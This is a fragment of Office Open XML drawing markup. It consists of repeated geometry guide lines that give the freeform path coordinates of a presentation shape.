              <a:gd name="connsiteY195" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX196" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY196" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX197" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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55080 w 1605470"/>
              <a:gd name="connsiteY132" fmla="*/ 2538816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70939 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 776648 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY192" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX193" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY193" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX194" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY194" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX195" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY195" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX196" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY196" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX197" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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70939 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 776648 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY192" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX193" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY193" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX194" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY194" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX195" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY195" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX196" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY196" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX197" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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63668 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY192" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX193" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY193" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX194" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY194" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX195" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY195" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX196" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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3668 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY192" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX193" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY193" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX194" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY194" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX195" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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63668 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY192" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX193" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY193" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX194" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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01423 w 1605470"/>
              <a:gd name="connsiteY140" fmla="*/ 2249479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64290 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1728772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8025 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 1475165 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 326326 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 1428585 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 325799 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 1357181 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 320507 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 1347099 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 335347 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 1334233 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 314647 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 1053424 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 322906 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 1044367 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 326818 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 1022828 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY192" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX193" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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64290 w 1605470"/>
              <a:gd name="connsiteY149" fmla="*/ 1728772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8025 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 1475165 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 326326 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 1428585 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 325799 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 1357181 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 320507 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 1347099 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 335347 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 1334233 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 314647 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 1053424 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 322906 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 1044367 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 326818 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 1022828 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 598582 h 6858000"/>
              <a:gd name="connsiteX179" fmla="*/ 224950 w 1605470"/>
              <a:gd name="connsiteY179" fmla="*/ 576846 h 6858000"/>
              <a:gd name="connsiteX180" fmla="*/ 204632 w 1605470"/>
              <a:gd name="connsiteY180" fmla="*/ 553868 h 6858000"/>
              <a:gd name="connsiteX181" fmla="*/ 239317 w 1605470"/>
              <a:gd name="connsiteY181" fmla="*/ 517614 h 6858000"/>
              <a:gd name="connsiteX182" fmla="*/ 201693 w 1605470"/>
              <a:gd name="connsiteY182" fmla="*/ 469651 h 6858000"/>
              <a:gd name="connsiteX183" fmla="*/ 195012 w 1605470"/>
              <a:gd name="connsiteY183" fmla="*/ 448559 h 6858000"/>
              <a:gd name="connsiteX184" fmla="*/ 201434 w 1605470"/>
              <a:gd name="connsiteY184" fmla="*/ 441529 h 6858000"/>
              <a:gd name="connsiteX185" fmla="*/ 200655 w 1605470"/>
              <a:gd name="connsiteY185" fmla="*/ 428927 h 6858000"/>
              <a:gd name="connsiteX186" fmla="*/ 190059 w 1605470"/>
              <a:gd name="connsiteY186" fmla="*/ 430161 h 6858000"/>
              <a:gd name="connsiteX187" fmla="*/ 184450 w 1605470"/>
              <a:gd name="connsiteY187" fmla="*/ 396240 h 6858000"/>
              <a:gd name="connsiteX188" fmla="*/ 146196 w 1605470"/>
              <a:gd name="connsiteY188" fmla="*/ 358810 h 6858000"/>
              <a:gd name="connsiteX189" fmla="*/ 124571 w 1605470"/>
              <a:gd name="connsiteY189" fmla="*/ 302178 h 6858000"/>
              <a:gd name="connsiteX190" fmla="*/ 103243 w 1605470"/>
              <a:gd name="connsiteY190" fmla="*/ 211375 h 6858000"/>
              <a:gd name="connsiteX191" fmla="*/ 94571 w 1605470"/>
              <a:gd name="connsiteY191" fmla="*/ 184179 h 6858000"/>
              <a:gd name="connsiteX192" fmla="*/ 13437 w 1605470"/>
              <a:gd name="connsiteY192" fmla="*/ 19287 h 6858000"/>
              <a:gd name="connsiteX193" fmla="*/ 0 w 1605470"/>
              <a:gd name="connsiteY19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8025 w 1605470"/>
              <a:gd name="connsiteY155" fmla="*/ 1475165 h 6858000"/>
              <a:gd name="connsiteX156" fmla="*/ 326326 w 1605470"/>
              <a:gd name="connsiteY156" fmla="*/ 1428585 h 6858000"/>
              <a:gd name="connsiteX157" fmla="*/ 325799 w 1605470"/>
              <a:gd name="connsiteY157" fmla="*/ 1357181 h 6858000"/>
              <a:gd name="connsiteX158" fmla="*/ 320507 w 1605470"/>
              <a:gd name="connsiteY158" fmla="*/ 1347099 h 6858000"/>
              <a:gd name="connsiteX159" fmla="*/ 335347 w 1605470"/>
              <a:gd name="connsiteY159" fmla="*/ 1334233 h 6858000"/>
              <a:gd name="connsiteX160" fmla="*/ 342792 w 1605470"/>
              <a:gd name="connsiteY160" fmla="*/ 1307086 h 6858000"/>
              <a:gd name="connsiteX161" fmla="*/ 343980 w 1605470"/>
              <a:gd name="connsiteY161" fmla="*/ 1189033 h 6858000"/>
              <a:gd name="connsiteX162" fmla="*/ 348665 w 1605470"/>
              <a:gd name="connsiteY162" fmla="*/ 1168288 h 6858000"/>
              <a:gd name="connsiteX163" fmla="*/ 340947 w 1605470"/>
              <a:gd name="connsiteY163" fmla="*/ 1142577 h 6858000"/>
              <a:gd name="connsiteX164" fmla="*/ 330253 w 1605470"/>
              <a:gd name="connsiteY164" fmla="*/ 1088484 h 6858000"/>
              <a:gd name="connsiteX165" fmla="*/ 314647 w 1605470"/>
              <a:gd name="connsiteY165" fmla="*/ 1053424 h 6858000"/>
              <a:gd name="connsiteX166" fmla="*/ 322906 w 1605470"/>
              <a:gd name="connsiteY166" fmla="*/ 1044367 h 6858000"/>
              <a:gd name="connsiteX167" fmla="*/ 326818 w 1605470"/>
              <a:gd name="connsiteY167" fmla="*/ 1022828 h 6858000"/>
              <a:gd name="connsiteX168" fmla="*/ 320445 w 1605470"/>
              <a:gd name="connsiteY168" fmla="*/ 932283 h 6858000"/>
              <a:gd name="connsiteX169" fmla="*/ 322681 w 1605470"/>
              <a:gd name="connsiteY169" fmla="*/ 915925 h 6858000"/>
              <a:gd name="connsiteX170" fmla="*/ 315310 w 1605470"/>
              <a:gd name="connsiteY170" fmla="*/ 896999 h 6858000"/>
              <a:gd name="connsiteX171" fmla="*/ 284718 w 1605470"/>
              <a:gd name="connsiteY171" fmla="*/ 821517 h 6858000"/>
              <a:gd name="connsiteX172" fmla="*/ 263668 w 1605470"/>
              <a:gd name="connsiteY172" fmla="*/ 751353 h 6858000"/>
              <a:gd name="connsiteX173" fmla="*/ 254540 w 1605470"/>
              <a:gd name="connsiteY173" fmla="*/ 741965 h 6858000"/>
              <a:gd name="connsiteX174" fmla="*/ 252501 w 1605470"/>
              <a:gd name="connsiteY174" fmla="*/ 724635 h 6858000"/>
              <a:gd name="connsiteX175" fmla="*/ 248897 w 1605470"/>
              <a:gd name="connsiteY175" fmla="*/ 681659 h 6858000"/>
              <a:gd name="connsiteX176" fmla="*/ 234316 w 1605470"/>
              <a:gd name="connsiteY176" fmla="*/ 635218 h 6858000"/>
              <a:gd name="connsiteX177" fmla="*/ 239327 w 1605470"/>
              <a:gd name="connsiteY177" fmla="*/ 613763 h 6858000"/>
              <a:gd name="connsiteX178" fmla="*/ 225269 w 1605470"/>
              <a:gd name="connsiteY178" fmla="*/ 598582 h 6858000"/>
